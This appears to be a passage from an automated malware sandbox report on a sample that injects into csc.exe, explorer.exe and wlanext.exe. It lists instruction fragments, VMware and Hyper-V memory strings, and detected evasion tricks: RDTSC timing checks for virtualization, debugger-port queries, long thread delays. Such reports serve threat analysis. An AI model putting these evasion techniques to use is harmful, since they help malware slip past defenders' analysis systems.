Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00416479 push ebp; ret	5_2_00416450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041640A push ebp; ret	5_2_00416450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041D4B5 push eax; ret	5_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041D56C push eax; ret	5_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041D502 push eax; ret	5_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041D50B push eax; ret	5_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00417D1E push esp; ret	5_2_00417D32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00417D3C push esp; ret	5_2_00417D32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00417655 push esi; iretd	5_2_00417656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041760D push esi; retf	5_2_0041761D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C09AD push ecx; mov dword ptr [esp], ecx	5_2_055C09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0510E9B5 push esp; retn 0000h	5_2_0510EAE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0510EB1E push esp; retn 0000h	5_2_0510EB1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0510EB02 push esp; retn 0000h	5_2_0510EB03
Source: C:\Windows\explorer.exe	Code function: 6_2_0E10CB1E push esp; retn 0000h	6_2_0E10CB1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0E10CB02 push esp; retn 0000h	6_2_0E10CB03
Source: C:\Windows\explorer.exe	Code function: 6_2_0E10C9B5 push esp; retn 0000h	6_2_0E10CAE7
Source: C:\Windows\explorer.exe	Code function: 6_2_0E239B02 push esp; retn 0000h	6_2_0E239B03
Source: C:\Windows\explorer.exe	Code function: 6_2_0E239B1E push esp; retn 0000h	6_2_0E239B1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0E2399B5 push esp; retn 0000h	6_2_0E239AE7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00FE003D push ecx; ret	7_2_00FE0050
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037309AD push ecx; mov dword ptr [esp], ecx	7_2_037309B6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EE91A3 push di; retf	7_2_00EE91A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EED4B5 push eax; ret	7_2_00EED508
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EE6479 push ebp; ret	7_2_00EE6450
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EE640A push ebp; ret	7_2_00EE6450
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EED56C push eax; ret	7_2_00EED572
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EED50B push eax; ret	7_2_00EED572
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EED502 push eax; ret	7_2_00EED508

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\SysWOW64\wlanext.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: ED9904 second address: ED990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: ED9B7E second address: ED9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe

Memory allocated: 28DE51A0000 memory reserve | memory write watch

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 5_2_00409AB0 rdtsc

5_2_00409AB0

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2891	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 7046	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 886	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 862	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Window / User API: threadDelayed 2340	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Window / User API: threadDelayed 7633	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-29745

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API coverage: 2.2 %
Source: C:\Windows\SysWOW64\wlanext.exe	API coverage: 2.0 %

Source: C:\Windows\explorer.exe TID: 4196	Thread sleep count: 2891 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4196	Thread sleep time: -5782000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4196	Thread sleep count: 7046 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4196	Thread sleep time: -14092000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5552	Thread sleep count: 2340 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5552	Thread sleep time: -4680000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5552	Thread sleep count: 7633 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5552	Thread sleep time: -15266000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe

Code function: 0_2_00007FF67FA51460 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF67FA51460

Source: explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000006.00000002.4578095774.000000000C474000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: u}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000002.4566997976.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000006.00000003.2980462538.000000000C35C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000003.2979328846.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 00000006.00000003.2980462538.000000000C35C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000006.00000000.2137414570.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000006.00000000.2133111600.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2133111600.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: explorer.exe, 00000006.00000000.2137414570.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000003.2979328846.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 00000006.00000003.2980462538.000000000C35C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@r
Source: explorer.exe, 00000006.00000000.2133111600.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000003.2979328846.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000006.00000000.2133111600.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 5_2_00409AB0 rdtsc

5_2_00409AB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 5_2_0040ACF0 LdrLoadDll,

5_2_0040ACF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C8550 mov eax, dword ptr fs:[00000030h]	5_2_055C8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C8550 mov eax, dword ptr fs:[00000030h]	5_2_055C8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FB570 mov eax, dword ptr fs:[00000030h]	5_2_055FB570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FB570 mov eax, dword ptr fs:[00000030h]	5_2_055FB570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F656A mov eax, dword ptr fs:[00000030h]	5_2_055F656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F656A mov eax, dword ptr fs:[00000030h]	5_2_055F656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F656A mov eax, dword ptr fs:[00000030h]	5_2_055F656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB562 mov eax, dword ptr fs:[00000030h]	5_2_055BB562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]	5_2_0566F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]	5_2_0566F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]	5_2_0566F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]	5_2_0566F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]	5_2_0566F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]	5_2_0566F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566F525 mov eax, dword ptr fs:[00000030h]	5_2_0566F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567B52F mov eax, dword ptr fs:[00000030h]	5_2_0567B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F7505 mov eax, dword ptr fs:[00000030h]	5_2_055F7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F7505 mov ecx, dword ptr fs:[00000030h]	5_2_055F7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05695537 mov eax, dword ptr fs:[00000030h]	5_2_05695537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]	5_2_055EE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]	5_2_055EE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]	5_2_055EE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]	5_2_055EE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE53E mov eax, dword ptr fs:[00000030h]	5_2_055EE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05656500 mov eax, dword ptr fs:[00000030h]	5_2_05656500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]	5_2_055D0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]	5_2_055D0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]	5_2_055D0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]	5_2_055D0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]	5_2_055D0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0535 mov eax, dword ptr fs:[00000030h]	5_2_055D0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]	5_2_055CD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]	5_2_055CD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]	5_2_055CD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]	5_2_055CD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]	5_2_055CD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CD534 mov eax, dword ptr fs:[00000030h]	5_2_055CD534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]	5_2_05694500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]	5_2_05694500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]	5_2_05694500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]	5_2_05694500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]	5_2_05694500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]	5_2_05694500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05694500 mov eax, dword ptr fs:[00000030h]	5_2_05694500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FD530 mov eax, dword ptr fs:[00000030h]	5_2_055FD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FD530 mov eax, dword ptr fs:[00000030h]	5_2_055FD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E95DA mov eax, dword ptr fs:[00000030h]	5_2_055E95DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C65D0 mov eax, dword ptr fs:[00000030h]	5_2_055C65D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FA5D0 mov eax, dword ptr fs:[00000030h]	5_2_055FA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FA5D0 mov eax, dword ptr fs:[00000030h]	5_2_055FA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE5CF mov eax, dword ptr fs:[00000030h]	5_2_055FE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE5CF mov eax, dword ptr fs:[00000030h]	5_2_055FE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F55C0 mov eax, dword ptr fs:[00000030h]	5_2_055F55C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056955C9 mov eax, dword ptr fs:[00000030h]	5_2_056955C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]	5_2_055E15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]	5_2_055E15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]	5_2_055E15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]	5_2_055E15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]	5_2_055E15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15F4 mov eax, dword ptr fs:[00000030h]	5_2_055E15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FC5ED mov eax, dword ptr fs:[00000030h]	5_2_055FC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FC5ED mov eax, dword ptr fs:[00000030h]	5_2_055FC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563D5D0 mov eax, dword ptr fs:[00000030h]	5_2_0563D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563D5D0 mov ecx, dword ptr fs:[00000030h]	5_2_0563D5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_055EE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_055EE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_055EE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_055EE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_055EE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_055EE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_055EE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EE5E7 mov eax, dword ptr fs:[00000030h]	5_2_055EE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C25E0 mov eax, dword ptr fs:[00000030h]	5_2_055C25E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056935D7 mov eax, dword ptr fs:[00000030h]	5_2_056935D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056935D7 mov eax, dword ptr fs:[00000030h]	5_2_056935D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056935D7 mov eax, dword ptr fs:[00000030h]	5_2_056935D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056405A7 mov eax, dword ptr fs:[00000030h]	5_2_056405A7
